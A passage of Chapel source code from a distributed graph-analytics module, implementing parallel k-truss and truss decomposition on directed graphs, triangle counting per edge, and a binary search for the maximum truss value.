return cntMsg;
} // end of proc TrussDecompositionMix
proc TrussNaiveDecompositionDirected(kvalue:int,nei:[?D1] int, start_i:[?D2] int,src:[?D3] int, dst:[?D4] int):string throws{
var SetCurF= new DistBag(int,Locales);//use bag to keep the current frontier
var SetNextF= new DistBag((int,int),Locales); //use bag to keep the next frontier
var N2=0:int;
var ConFlag=true:bool;
EdgeDeleted=-1;
var RemovedEdge=0: int;
var TriCount=makeDistArray(Ne,atomic int);
var EReverse=makeDistArray(Ne,set((int,int),parSafe = true) );
var k=kvalue;
forall i in TriCount {
i.write(0);
}
var timer:Timer;
proc RemoveDuplicatedEdges( cur: int):int {
if ( (cur<D3.low) || (cur >D3.high) || (cur==0) ) {
return -1;
}
var u=src[cur]:int;
var v=dst[cur]:int;
var lu=start_i[u]:int;
var nu=nei[u]:int;
var lv=start_i[v]:int;
var nv=nei[v]:int;
var DupE:int;
if ((nu<=1) || (cur<=lu)) {
DupE=-1;
} else {
DupE =binSearchE(dst,lu,cur-1,v);
}
if (DupE!=-1) {
EdgeDeleted[cur]=k-1;
} else {
if (u>v) {
if (nv<=0) {
DupE=-1;
} else {
DupE=binSearchE(dst,lv,lv+nv-1,u);
}
if (DupE!=-1) {
EdgeDeleted[cur]=k-1;
}
}
}
return DupE;
}
// given vertces u and v, return the edge ID e=<u,v> or e=<v,u>
proc findEdge(u:int,v:int):int {
//given the destinontion arry ary, the edge range [l,h], return the edge ID e where ary[e]=key
if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
return -1;
// we do not accept self-loop
}
var beginE=start_i[u];
var eid=-1:int;
if (nei[u]>0) {
if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
// search <u,v> in undirect edges
}
}
if (eid==-1) {// if b
beginE=start_i[v];
if (nei[v]>0) {
if ( (beginE>=0) && (u>=dst[beginE]) && (u<=dst[beginE+nei[v]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[v]-1,u);
// search <v,u> in undirect edges
}
}
}// end of if b
return eid;
}// end of proc findEdge(u:int,v:int)
// given vertces u and v, return the edge ID e=<u,v>
proc exactEdge(u:int,v:int):int {
//given the destinontion arry ary, the edge range [l,h], return the edge ID e where ary[e]=key
if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
return -1;
// we do not accept self-loop
}
var beginE=start_i[u];
var eid=-1:int;
if (nei[u]>0) {
if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
// search <u,v> in undirect edges
}
}
return eid;
}// end of proc exatEdge(u:int,v:int)
//here we begin the first naive version
coforall loc in Locales {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in startEdge..endEdge {
var v1=src[i];
var v2=dst[i];
if ( v1==v2) {
EdgeDeleted[i]=k-1;
//writeln("My locale=",here.id," Find self-loop ",i,"=<",src[i],",",dst[i],">");
}
if (EdgeDeleted[i]==-1) {
var DupE= RemoveDuplicatedEdges(i);
if (DupE!=-1) {
//we find duplicated edge
}
}
}
}
}// end of coforall loc
timer.start();
//writeln("After Preprocessing");
//we will try to remove all the unnecessary edges in the graph
{
//ConFlag=false;
// first we calculate the number of triangles
coforall loc in Locales with ( ref SetNextF) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in startEdge..endEdge {
TriCount[i].write(0);
}
//forall i in startEdge..endEdge with(ref SetCurF){
forall i in startEdge..endEdge {
var u = src[i];
var v = dst[i];
var du=nei[u];
var dv=nei[v];
{
var beginTmp=start_i[u];
var endTmp=beginTmp+nei[u]-1;
if ((EdgeDeleted[i]==-1) && (u!=v) ){
if ( (nei[u]>1) ){
//forall x in dst[beginTmp..endTmp] with (ref uadj) {
forall x in dst[beginTmp..endTmp] {
var e=findEdge(u,x);//here we find the edge ID to check if it has been removed
if (e==-1){
//writeln("vertex ",x," and ",u," findEdge Error self-loop or no such edge");
} else {
if ((EdgeDeleted[e] ==-1) && (x !=v) && (i<e)) {
var e3=findEdge(x,v);
if (e3!=-1) {
if (EdgeDeleted[e3]==-1) {
TriCount[i].add(1);
TriCount[e].add(1);
TriCount[e3].add(1);
EReverse[e3].add((i,e));
}
}
}
}
}
}
}
beginTmp=start_i[v];
endTmp=beginTmp+nei[v]-1;
if ((EdgeDeleted[i]==-1) && (u!=v) ){
if ( (nei[v]>0) ){
//forall x in dst[beginTmp..endTmp] with (ref vadj) {
forall x in dst[beginTmp..endTmp] {
var e=findEdge(v,x);//here we find the edge ID to check if it has been removed
if (e==-1){
//writeln("vertex ",x," and ",v," findEdge Error self-loop or no such edge");
} else {
if ((EdgeDeleted[e] ==-1) && (x !=u) && (i<e)) {
//var e3=findEdge(x,v);
var e3=findEdge(x,u);
if (e3!=-1) {
if ((EdgeDeleted[e3]==-1) && (src[e3]==x) && (dst[e3]==u) && (i<e3)) {
TriCount[i].add(1);
TriCount[e].add(1);
TriCount[e3].add(1);
}
}
}
}
}
}
}
}// end of if du<=dv
}// end of forall. We get the number of triangles for each edge
}// end of on loc
} // end of coforall loc in Locales
} // end of triangle counting
while (ConFlag) {
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in startEdge..endEdge with(ref SetCurF){
}
}// end of on loc
} // end of coforall loc in Locales
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
// each locale only handles the edges owned by itself
forall i in startEdge..endEdge with(ref SetCurF){
if ((EdgeDeleted[i]==-1) && (TriCount[i].read() < k-2)) {
EdgeDeleted[i] = 1-k;
SetCurF.add(i);
}
}
}// end of on loc
} // end of coforall loc in Locales
if ( SetCurF.getSize()<=0){
//ConFlag=false;
k+=1;
}
SetCurF.clear();
var tmpi=0;
ConFlag=false;
while tmpi<Ne {
if (EdgeDeleted[tmpi]==-1) {
ConFlag=true;
break;
} else {
tmpi+=1;
}
}
N2+=1;
}// end while
timer.stop();
AllRemoved=true;
var tmpi=0;
for i in 0..Ne-1 {
if (EdgeDeleted[i]==-1) {
AllRemoved=false;
} else {
tmpi+=1;
}
}
outMsg="After KTruss Naive Decomposition Directed , Max K ="+(k-1):string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After KTruss Naive Decomposition Directed,Total execution time="+(timer.elapsed()):string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After KTruss Naive Decomposition Directed,Total number of iterations ="+N2:string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After KTruss Naive Decomposition Directed,Totally remove "+tmpi:string+ " Edges";
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
var countName = st.nextName();
var countEntry = new shared SymEntry(EdgeDeleted);
st.addEntry(countName, countEntry);
var cntMsg = 'created ' + st.attrib(countName);
return cntMsg;
} // end of proc TrussNaiveDecompositionDirected
//For directed graph, using directed method.
proc TrussDecompositionDirected(kvalue:int,nei:[?D1] int, start_i:[?D2] int,src:[?D3] int, dst:[?D4] int):string throws{
var SetCurF= new DistBag(int,Locales);//use bag to keep the current frontier
var SetNextF= new DistBag((int,int),Locales); //use bag to keep the next frontier
var N2=0:int;
var k=kvalue;
var ConFlag=true:bool;
EdgeDeleted=-1;
var RemovedEdge=0: int;
var TriCount=makeDistArray(Ne,atomic int);
var EReverse=makeDistArray(Ne,set((int,int),parSafe = true) );
forall i in TriCount {
i.write(0);
}
var timer:Timer;
proc RemoveDuplicatedEdges( cur: int):int {
if ( (cur<D3.low) || (cur >D3.high) || (cur==0) ) {
return -1;
}
var u=src[cur]:int;
var v=dst[cur]:int;
var lu=start_i[u]:int;
var nu=nei[u]:int;
var lv=start_i[v]:int;
var nv=nei[v]:int;
var DupE:int;
if ((nu<=1) || (cur<=lu)) {
DupE=-1;
} else {
DupE =binSearchE(dst,lu,cur-1,v);
}
if (DupE!=-1) {
EdgeDeleted[cur]=k-1;
} else {
if (u>v) {
if (nv<=0) {
DupE=-1;
} else {
DupE=binSearchE(dst,lv,lv+nv-1,u);
}
if (DupE!=-1) {
EdgeDeleted[cur]=k-1;
}
}
}
return DupE;
}
// given vertces u and v, return the edge ID e=<u,v> or e=<v,u>
proc findEdge(u:int,v:int):int {
//given the destinontion arry ary, the edge range [l,h], return the edge ID e where ary[e]=key
if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
return -1;
// we do not accept self-loop
}
var beginE=start_i[u];
var eid=-1:int;
if (nei[u]>0) {
if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
// search <u,v> in undirect edges
}
}
if (eid==-1) {// if b
beginE=start_i[v];
if (nei[v]>0) {
if ( (beginE>=0) && (u>=dst[beginE]) && (u<=dst[beginE+nei[v]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[v]-1,u);
// search <v,u> in undirect edges
}
}
}// end of if b
return eid;
}// end of proc findEdge(u:int,v:int)
// given vertces u and v, return the edge ID e=<u,v>
proc exactEdge(u:int,v:int):int {
//given the destinontion arry ary, the edge range [l,h], return the edge ID e where ary[e]=key
if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
return -1;
// we do not accept self-loop
}
var beginE=start_i[u];
var eid=-1:int;
if (nei[u]>0) {
if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
// search <u,v> in undirect edges
}
}
return eid;
}// end of proc exatEdge(u:int,v:int)
//here we begin the first naive version
coforall loc in Locales {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in startEdge..endEdge {
var v1=src[i];
var v2=dst[i];
if ( v1==v2) {
EdgeDeleted[i]=k-1;
}
if (EdgeDeleted[i]==-1) {
var DupE= RemoveDuplicatedEdges(i);
if (DupE!=-1) {
//we find duplicated edge
}
}
}
}
}// end of coforall loc
//writeln("After Preprocessing");
timer.start();
//we will try to remove all the unnecessary edges in the graph
while (ConFlag) {
//ConFlag=false;
// first we calculate the number of triangles
coforall loc in Locales with ( ref SetNextF) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in startEdge..endEdge {
TriCount[i].write(0);
}
//forall i in startEdge..endEdge with(ref SetCurF){
forall i in startEdge..endEdge {
var u = src[i];
var v = dst[i];
var du=nei[u];
var dv=nei[v];
{
var beginTmp=start_i[u];
var endTmp=beginTmp+nei[u]-1;
if ((EdgeDeleted[i]==-1) && (u!=v) ){
if ( (nei[u]>1) ){
//forall x in dst[beginTmp..endTmp] with (ref uadj) {
forall x in dst[beginTmp..endTmp] {
var e=findEdge(u,x);//here we find the edge ID to check if it has been removed
if (e==-1){
//writeln("vertex ",x," and ",u," findEdge Error self-loop or no such edge");
} else {
if ((EdgeDeleted[e] ==-1) && (x !=v) && (i<e)) {
var e3=findEdge(x,v);
if (e3!=-1) {
if (EdgeDeleted[e3]==-1) {
TriCount[i].add(1);
TriCount[e].add(1);
TriCount[e3].add(1);
EReverse[e3].add((i,e));
}
}
}
}
}
}
}
beginTmp=start_i[v];
endTmp=beginTmp+nei[v]-1;
if ((EdgeDeleted[i]==-1) && (u!=v) ){
if ( (nei[v]>0) ){
//forall x in dst[beginTmp..endTmp] with (ref vadj) {
forall x in dst[beginTmp..endTmp] {
var e=findEdge(v,x);//here we find the edge ID to check if it has been removed
if (e==-1){
//writeln("vertex ",x," and ",v," findEdge Error self-loop or no such edge");
} else {
if ((EdgeDeleted[e] ==-1) && (x !=u) && (i<e)) {
//var e3=findEdge(x,v);
var e3=findEdge(x,u);
if (e3!=-1) {
if ((EdgeDeleted[e3]==-1) && (src[e3]==x) && (dst[e3]==u) && (i<e3)) {
TriCount[i].add(1);
TriCount[e].add(1);
TriCount[e3].add(1);
}
}
}
}
}
}
}
}// end of if du<=dv
}// end of forall. We get the number of triangles for each edge
}// end of on loc
} // end of coforall loc in Locales
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
// each locale only handles the edges owned by itself
forall i in startEdge..endEdge with(ref SetCurF){
if ((EdgeDeleted[i]==-1) && (TriCount[i].read() < k-2)) {
EdgeDeleted[i] = 1-k;
SetCurF.add(i);
}
}
}// end of on loc
} // end of coforall loc in Locales
ConFlag=false;
// we try to remove as many edges as possible in the following code
var tmpN2=0:int;
while (SetCurF.getSize()>0) {
//first we build the edge set that will be affected by the removed edges in SetCurF
coforall loc in Locales with ( ref SetNextF) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in SetCurF with (ref SetNextF) {
if (xlocal(i,startEdge,endEdge)) {//each local only check the owned edges
var v1=src[i];
var v2=dst[i];
var dv1=nei[v1];
var dv2=nei[v2];
{
var nextStart=start_i[v1];
var nextEnd=start_i[v1]+nei[v1]-1;
if (nei[v1]>1) {
forall j in nextStart..nextEnd with (ref SetNextF){
var v3=src[j];//v3==v1
var v4=dst[j];
var tmpe:int;
if ( (EdgeDeleted[j]<=-1) && ( v2!=v4 ) ) {
tmpe=findEdge(v2,v4);
if (tmpe!=-1) {// there is such third edge
if ( EdgeDeleted[tmpe]<=-1 ) {
if ((EdgeDeleted[j]==-1) && (EdgeDeleted[tmpe]==-1)) {
TriCount[tmpe].sub(1);
if TriCount[tmpe].read() <k-2 {
SetNextF.add((i,tmpe));
}
TriCount[j].sub(1);
if TriCount[j].read() <k-2 {
SetNextF.add((i,j));
}
} else {
//if ((EdgeDeleted[j]==-1) && (i<tmpe)) {
if ((EdgeDeleted[j]==-1) ) {
TriCount[j].sub(1);
if TriCount[j].read() <k-2 {
SetNextF.add((i,j));
}
} else {
if ((EdgeDeleted[tmpe]==-1) &&(i<j)) {
TriCount[tmpe].sub(1);
if TriCount[tmpe].read()<k-2 {
SetNextF.add((i,tmpe));
//EdgeDeleted[tmpe]=1-k;
}
}
}
}
}
}
}// end of if EdgeDeleted[j]<=-1
}// end of forall j in nextStart..nextEnd
}// end of if nei[v1]>1
nextStart=start_i[v2];
nextEnd=start_i[v2]+nei[v2]-1;
if (nei[v2]>0) {
forall j in nextStart..nextEnd with (ref SetNextF){
var v3=src[j];//v3==v2
var v4=dst[j];
var tmpe:int;
if ( (EdgeDeleted[j]<=-1) && ( v1!=v4 ) ) {
tmpe=exactEdge(v4,v1);
if (tmpe!=-1) {// there is such third edge
if ( EdgeDeleted[tmpe]<=-1 ) {
if ((EdgeDeleted[j]==-1) && (EdgeDeleted[tmpe]==-1)) {
TriCount[tmpe].sub(1);
if TriCount[tmpe].read() <k-2 {
SetNextF.add((i,tmpe));
}
TriCount[j].sub(1);
if TriCount[j].read() <k-2 {
SetNextF.add((i,j));
}
} else {
if ((EdgeDeleted[j]==-1) && (i<tmpe) ) {
TriCount[j].sub(1);
if TriCount[j].read() <k-2 {
SetNextF.add((i,j));
}
} else {
if ((EdgeDeleted[tmpe]==-1) && (i<j) ) {
TriCount[tmpe].sub(1);
if TriCount[tmpe].read() <k-2 {
SetNextF.add((i,tmpe));
}
}
}
}
}
}
}
}// end of forall j in nextStart..nextEnd
}// end of if
if EReverse[i].size>0 {
forall (e1,e2) in EReverse[i] {
if ((EdgeDeleted[e1]==-1) && (EdgeDeleted[e2]==-1)) {
TriCount[e1].sub(1);
if TriCount[e1].read() <k-2 {
SetNextF.add((i,e1));
}
TriCount[e2].sub(1);
if TriCount[e2].read() <k-2 {
SetNextF.add((i,e2));
}
}
}
}
}
} // end if (xlocal(i,startEdge,endEdge)
} // end forall i in SetCurF with (ref SetNextF)
} //end on loc
} //end coforall loc in Locales
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in SetCurF {
if (xlocal(i,startEdge,endEdge) && (EdgeDeleted[i]==1-k)) {//each local only check the owned edges
EdgeDeleted[i]=k-1;
}
}
}
}
SetCurF.clear();
coforall loc in Locales with (ref SetNextF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
var rset = new set((int,int), parSafe = true);
forall (i,j) in SetNextF with(ref rset) {
if (xlocal(j,startEdge,endEdge)) {//each local only check the owned edges
EdgeDeleted[j]=1-k;
SetCurF.add(j);
// rset.add((i,j));// just want (i,j) is unique in rset
}
}// end of forall
}
}
SetNextF.clear();
tmpN2+=1;
}// end of while
var tmpi=0;
ConFlag=false;
while tmpi<Ne {
if (EdgeDeleted[tmpi]==-1) {
ConFlag=true;
k+=1;
break;
}
tmpi+=1;
}
N2+=1;
}// end while
timer.stop();
outMsg="After KTruss Decomposition Directed , Max K ="+(k-1):string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After KTruss Decomposition Directed ,Total execution time="+(timer.elapsed()):string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After KTruss Decomposition Directed ,Total number of iterations ="+N2:string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
var countName = st.nextName();
var countEntry = new shared SymEntry(EdgeDeleted);
st.addEntry(countName, countEntry);
var cntMsg = 'created ' + st.attrib(countName);
return cntMsg;
} // end of proc KTrussDecompositionDirected
var kLow=3:int;
var kUp:int;
var kMid:int;
var maxtimer:Timer;
if (!Directed) {//for undirected graph
if (kValue>0) {// k-truss analysis
var PTriCount=makeDistArray(Ne,int);
PTriCount=0;
repMsg=kTrussNaiveListIntersection(kValue,
toSymEntry(ag.getNEIGHBOR(), int).a,
toSymEntry(ag.getSTART_IDX(), int).a,
toSymEntry(ag.getSRC(), int).a,
toSymEntry(ag.getDST(), int).a,
toSymEntry(ag.getNEIGHBOR_R(), int).a,
toSymEntry(ag.getSTART_IDX_R(), int).a,
toSymEntry(ag.getSRC_R(), int).a,
toSymEntry(ag.getDST_R(), int).a,
PTriCount);
PTriCount=0;
repMsg=kTrussNaiveSetSearchSmall(kValue,
toSymEntry(ag.getNEIGHBOR(), int).a,
toSymEntry(ag.getSTART_IDX(), int).a,
toSymEntry(ag.getSRC(), int).a,
toSymEntry(ag.getDST(), int).a,
toSymEntry(ag.getNEIGHBOR_R(), int).a,
toSymEntry(ag.getSTART_IDX_R(), int).a,
toSymEntry(ag.getSRC_R(), int).a,
toSymEntry(ag.getDST_R(), int).a,
PTriCount);
PTriCount=0;
repMsg=kTrussNaiveSetSearchSmallSeq(kValue,
toSymEntry(ag.getNEIGHBOR(), int).a,
toSymEntry(ag.getSTART_IDX(), int).a,
toSymEntry(ag.getSRC(), int).a,
toSymEntry(ag.getDST(), int).a,
toSymEntry(ag.getNEIGHBOR_R(), int).a,
toSymEntry(ag.getSTART_IDX_R(), int).a,
toSymEntry(ag.getSRC_R(), int).a,
toSymEntry(ag.getDST_R(), int).a,
PTriCount);
PTriCount=0;
repMsg=kTrussNaivePathMerge(kValue,
toSymEntry(ag.getNEIGHBOR(), int).a,
toSymEntry(ag.getSTART_IDX(), int).a,
toSymEntry(ag.getSRC(), int).a,
toSymEntry(ag.getDST(), int).a,
toSymEntry(ag.getNEIGHBOR_R(), int).a,
toSymEntry(ag.getSTART_IDX_R(), int).a,
toSymEntry(ag.getSRC_R(), int).a,
toSymEntry(ag.getDST_R(), int).a,
PTriCount);
PTriCount=0;
repMsg=kTrussNaiveMinSearch(kValue,
toSymEntry(ag.getNEIGHBOR(), int).a,
toSymEntry(ag.getSTART_IDX(), int).a,
toSymEntry(ag.getSRC(), int).a,
toSymEntry(ag.getDST(), int).a,
toSymEntry(ag.getNEIGHBOR_R(), int).a,
toSymEntry(ag.getSTART_IDX_R(), int).a,
toSymEntry(ag.getSRC_R(), int).a,
toSymEntry(ag.getDST_R(), int).a,
PTriCount);
/*
PTriCount=0;
repMsg=kTrussListIntersection(kValue,ag.neighbour.a, ag.start_i.a,ag.src.a,ag.dst.a,
ag.neighbourR.a, ag.start_iR.a,ag.srcR.a,ag.dstR.a,PTriCount);
*/
var AtoTriCount=makeDistArray(Ne,atomic int);
forall i in AtoTriCount {
i.write(0);
}
repMsg=kTruss(kValue,
toSymEntry(ag.getNEIGHBOR(), int).a,
toSymEntry(ag.getSTART_IDX(), int).a,
toSymEntry(ag.getSRC(), int).a,
toSymEntry(ag.getDST(), int).a,
toSymEntry(ag.getNEIGHBOR_R(), int).a,
toSymEntry(ag.getSTART_IDX_R(), int).a,
toSymEntry(ag.getSRC_R(), int).a,
toSymEntry(ag.getDST_R(), int).a, AtoTriCount);
//var AtoTriCount=makeDistArray(Ne,atomic int);
forall i in AtoTriCount {
i.write(0);
}
repMsg=kTrussMix(kValue,
toSymEntry(ag.getNEIGHBOR(), int).a,
toSymEntry(ag.getSTART_IDX(), int).a,
toSymEntry(ag.getSRC(), int).a,
toSymEntry(ag.getDST(), int).a,
toSymEntry(ag.getNEIGHBOR_R(), int).a,
toSymEntry(ag.getSTART_IDX_R(), int).a,
toSymEntry(ag.getSRC_R(), int).a,
toSymEntry(ag.getDST_R(), int).a, AtoTriCount);
/*
repMsg=kTrussNaiveDirected(kValue,ag.neighbour.a, ag.start_i.a,ag.src.a,ag.dst.a );
repMsg=kTrussDirected(kValue,ag.neighbour.a, ag.start_i.a,ag.src.a,ag.dst.a );
*/
} else if (kValue==-2) {
//writeln("truss decomposition");
var PTriCount=makeDistArray(Ne,int);
/*
PTriCount=0;
repMsg=TrussDecompositionNaive(3,ag.neighbour.a, ag.start_i.a,ag.src.a,ag.dst.a,
ag.neighbourR.a, ag.start_iR.a,ag.srcR.a,ag.dstR.a,PTriCount);
*/
PTriCount=0;
repMsg=TrussDecompositionNaivePathMerge(3,
toSymEntry(ag.getNEIGHBOR(), int).a,
toSymEntry(ag.getSTART_IDX(), int).a,
toSymEntry(ag.getSRC(), int).a,
toSymEntry(ag.getDST(), int).a,
toSymEntry(ag.getNEIGHBOR_R(), int).a,
toSymEntry(ag.getSTART_IDX_R(), int).a,
toSymEntry(ag.getSRC_R(), int).a,
toSymEntry(ag.getDST_R(), int).a, PTriCount);
var AtoTriCount=makeDistArray(Ne,atomic int);
forall i in AtoTriCount {
i.write(0);
}
repMsg=TrussDecompositionTruss(3,
toSymEntry(ag.getNEIGHBOR(), int).a,
toSymEntry(ag.getSTART_IDX(), int).a,
toSymEntry(ag.getSRC(), int).a,
toSymEntry(ag.getDST(), int).a,
toSymEntry(ag.getNEIGHBOR_R(), int).a,
toSymEntry(ag.getSTART_IDX_R(), int).a,
toSymEntry(ag.getSRC_R(), int).a,
toSymEntry(ag.getDST_R(), int).a, AtoTriCount);
/*
PTriCount=0;
repMsg=TrussNaiveDecompositionDirected(3,ag.neighbour.a, ag.start_i.a,ag.src.a,ag.dst.a);
*/
//var AtoTriCount=makeDistArray(Ne,atomic int);
forall i in AtoTriCount {
i.write(0);
}
repMsg=TrussDecompositionTrussMix(3,
toSymEntry(ag.getNEIGHBOR(), int).a,
toSymEntry(ag.getSTART_IDX(), int).a,
toSymEntry(ag.getSRC(), int).a,
toSymEntry(ag.getDST(), int).a,
toSymEntry(ag.getNEIGHBOR_R(), int).a,
toSymEntry(ag.getSTART_IDX_R(), int).a,
toSymEntry(ag.getSRC_R(), int).a,
toSymEntry(ag.getDST_R(), int).a, AtoTriCount);
} else {//k max branch
//first the optimized method
maxtimer.clear();
var PTriCount=makeDistArray(Ne,atomic int);//keep the last no all removed results
var aPlTriCount=makeDistArray(Ne,atomic int);//for local use
forall i in 0..Ne-1 {
PTriCount[i].write(0);
aPlTriCount[i].write(0);
}
EdgeDeleted=-1;
lEdgeDeleted=-1;//for local use
maxtimer.start();
kLow=3;
// we first check kLow=3
repMsg=kTruss(kLow,
toSymEntry(ag.getNEIGHBOR(), int).a,
toSymEntry(ag.getSTART_IDX(), int).a,
toSymEntry(ag.getSRC(), int).a,
toSymEntry(ag.getDST(), int).a,
toSymEntry(ag.getNEIGHBOR_R(), int).a,
toSymEntry(ag.getSTART_IDX_R(), int).a,
toSymEntry(ag.getSRC_R(), int).a,
toSymEntry(ag.getDST_R(), int).a, aPlTriCount);
forall i in 0..Ne-1 {// first keep last time's results
lEdgeDeleted[i]=EdgeDeleted[i];
PTriCount[i].write(aPlTriCount[i].read());
}
kUp=getupK(toSymEntry(ag.getNEIGHBOR(), int).a, toSymEntry(ag.getNEIGHBOR_R(), int).a);
outMsg="Estimated kUp="+kUp:string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
if ((!AllRemoved) && (kUp>3)) {// we need to check if max k >3
var ConLoop=true:bool;
while ( (ConLoop) && (kLow<kUp)) {
// we will continuely check if the up value can remove all edges
forall i in 0..Ne-1 {// first keep last time's results
lEdgeDeleted[i]=EdgeDeleted[i];
aPlTriCount[i].write(PTriCount[i].read());
}
// we check the larget k vaule kUp which is the upper bound of max k
// we will use kMid to reduce kUp
AllRemoved=SkMaxTruss(kUp,
toSymEntry(ag.getNEIGHBOR(), int).a,
toSymEntry(ag.getSTART_IDX(), int).a,
toSymEntry(ag.getSRC(), int).a,
toSymEntry(ag.getDST(), int).a,
toSymEntry(ag.getNEIGHBOR_R(), int).a,
toSymEntry(ag.getSTART_IDX_R(), int).a,
toSymEntry(ag.getSRC_R(), int).a,
toSymEntry(ag.getDST_R(), int).a, aPlTriCount,lEdgeDeleted);
if (!AllRemoved) { //the up value is the max k
ConLoop=false;
} else {// we will check the mid value to reduce kUp
kMid= (kLow+kUp)/2;
forall i in 0..Ne-1 {
lEdgeDeleted[i]=EdgeDeleted[i];
aPlTriCount[i].write(PTriCount[i].read());
}
//"Try mid=",kMid);
AllRemoved=SkMaxTruss(kMid,
toSymEntry(ag.getNEIGHBOR(), int).a,
toSymEntry(ag.getSTART_IDX(), int).a,
toSymEntry(ag.getSRC(), int).a,
toSymEntry(ag.getDST(), int).a,
toSymEntry(ag.getNEIGHBOR_R(), int).a,
toSymEntry(ag.getSTART_IDX_R(), int).a,
toSymEntry(ag.getSRC_R(), int).a,
toSymEntry(ag.getDST_R(), int).a, aPlTriCount,lEdgeDeleted);
if (AllRemoved) { // if mid value can remove all edges, we will reduce the up value for checking
kUp=kMid-1;
} else { // we will improve both low and mid value
if kMid>=kUp-1 {
ConLoop=false;
kUp=kMid;
} else {// we will update the low value and then check the mid value
// until all edges are removed
while ((AllRemoved==false) && (kMid<kUp-1)) {
kLow=kMid;
kMid= (kLow+kUp)/2;
forall i in 0..Ne-1 {
EdgeDeleted[i]=lEdgeDeleted[i];
PTriCount[i].write(aPlTriCount[i].read());
}
//("Try mid again=",kMid);
AllRemoved=SkMaxTruss(kMid,
toSymEntry(ag.getNEIGHBOR(), int).a,
toSymEntry(ag.getSTART_IDX(), int).a,
toSymEntry(ag.getSRC(), int).a,
toSymEntry(ag.getDST(), int).a,
toSymEntry(ag.getNEIGHBOR_R(), int).a,
toSymEntry(ag.getSTART_IDX_R(), int).a,
toSymEntry(ag.getSRC_R(), int).a,
toSymEntry(ag.getDST_R(), int).a, aPlTriCount,lEdgeDeleted);
}
if (!AllRemoved) {
kUp=kMid;
ConLoop=false;
} else {
kUp=kMid-1;
}
}
}
}
}// end of while
var countName = st.nextName();
var countEntry = new shared SymEntry(lEdgeDeleted);
st.addEntry(countName, countEntry);
repMsg = 'created ' + st.attrib(countName);
maxtimer.stop();
outMsg="After Max KTruss, Total execution time ="+(maxtimer.elapsed()):string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After Max KTruss, Max k="+kUp:string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
} else {//kUp<=3 or AllRemoved==true
maxtimer.stop();
outMsg="After Max KTruss,Total execution time ="+(maxtimer.elapsed()):string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
if (AllRemoved==false) {
outMsg="After Max KTruss, Max k=3";
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
} else {
outMsg="After Max KTruss,Max k=2";
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
}
}
//second the Mix method.
var AtoTriCount=makeDistArray(Ne,atomic int);
var lAtoTriCount=makeDistArray(Ne,atomic int);
forall i in AtoTriCount {
i.write(0);
}
forall i in lAtoTriCount {
i.write(0);
}
maxtimer.stop();
maxtimer.clear();
EdgeDeleted=-1;
lEdgeDeleted=-1;
maxtimer.start();
kLow=3;
// we first initialize the kmax from kLow=3
repMsg=kTrussMix(kLow,
toSymEntry(ag.getNEIGHBOR(), int).a,
toSymEntry(ag.getSTART_IDX(), int).a,
toSymEntry(ag.getSRC(), int).a,
toSymEntry(ag.getDST(), int).a,
toSymEntry(ag.getNEIGHBOR_R(), int).a,
toSymEntry(ag.getSTART_IDX_R(), int).a,
toSymEntry(ag.getSRC_R(), int).a,
toSymEntry(ag.getDST_R(), int).a, lAtoTriCount);
forall i in 0..Ne-1 {
lEdgeDeleted[i]=EdgeDeleted[i];
AtoTriCount[i].write(lAtoTriCount[i].read());
}
kUp=getupK(toSymEntry(ag.getNEIGHBOR(), int).a, toSymEntry(ag.getNEIGHBOR_R(), int).a);
outMsg="Estimated kUp="+kUp:string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
if ((AllRemoved==false) && (kUp>3)) {// k max >3
var ConLoop=true:bool;
